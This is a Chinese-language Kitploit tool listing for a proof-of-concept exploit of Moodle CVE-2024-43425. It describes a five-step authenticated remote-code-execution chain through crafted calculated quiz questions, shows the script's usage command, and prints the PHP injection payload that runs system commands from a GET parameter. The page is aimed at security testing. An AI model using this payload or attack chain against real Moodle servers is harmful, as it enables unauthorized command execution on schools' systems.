Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-43425-Poc — 针对Moodle CVE-2024-43425的概念验证漏洞利用,通过精心设计的计算题实现认证RCE。自动执行登录、令牌提取、载荷上传和触发,用于安全测试。 | Kitploit
工具/GitHubGitHub/aninfosec/cve-2024-43425-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubaninfosec/cve-2024-43425-poc

CVE-2024-43425-Poc

针对Moodle CVE-2024-43425的概念验证漏洞利用,通过精心设计的计算题实现认证RCE。自动执行登录、令牌提取、载荷上传和触发,用于安全测试。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-43425-Poc

CVE 概述

CVE ID: CVE-2024-43425

描述: Moodle 允许经过身份验证的教师级用户通过测验编辑器界面上传恶意的计算题。 影响: 远程代码执行 (RCE) 原因: 对计算题内的数学负载清理不当,导致通过数据集向导实现命令注入。

要求:

  • 有效的登录凭据
  • 访问测验编辑界面的权限(通常是教师或管理员角色)
  • 已知的 cmid(测验模块 ID)和 courseid

此脚本执行 5 步攻击:

步骤描述
1️⃣获取登录令牌 (logintoken)
2️⃣登录并建立有效的 MoodleSession
3️⃣从测验编辑页面提取 sesskey、ctxid 和 category
4️⃣上传一个特制的包含 RCE 负载的计算题
5️⃣通过数据集向导页面触发负载

使用说明

要求:

  • Python 3
  • Python 库: requests、bs4 (BeautifulSoup)
root@kitploit:~
pip3 install requests bs4
root@kitploit:~
python3 exploit_cve_2024_43425.py \
  --url http://192.168.2.12/moodle \
  --username test \
  --password 'Test@123' \
  --courseid 1 \
  --cmid 1 \
  --cmd 'whoami'

使用的 Payload:

root@kitploit:~
answer[0] = "(1)->{system($_GET[chr(97)])}"
下载工具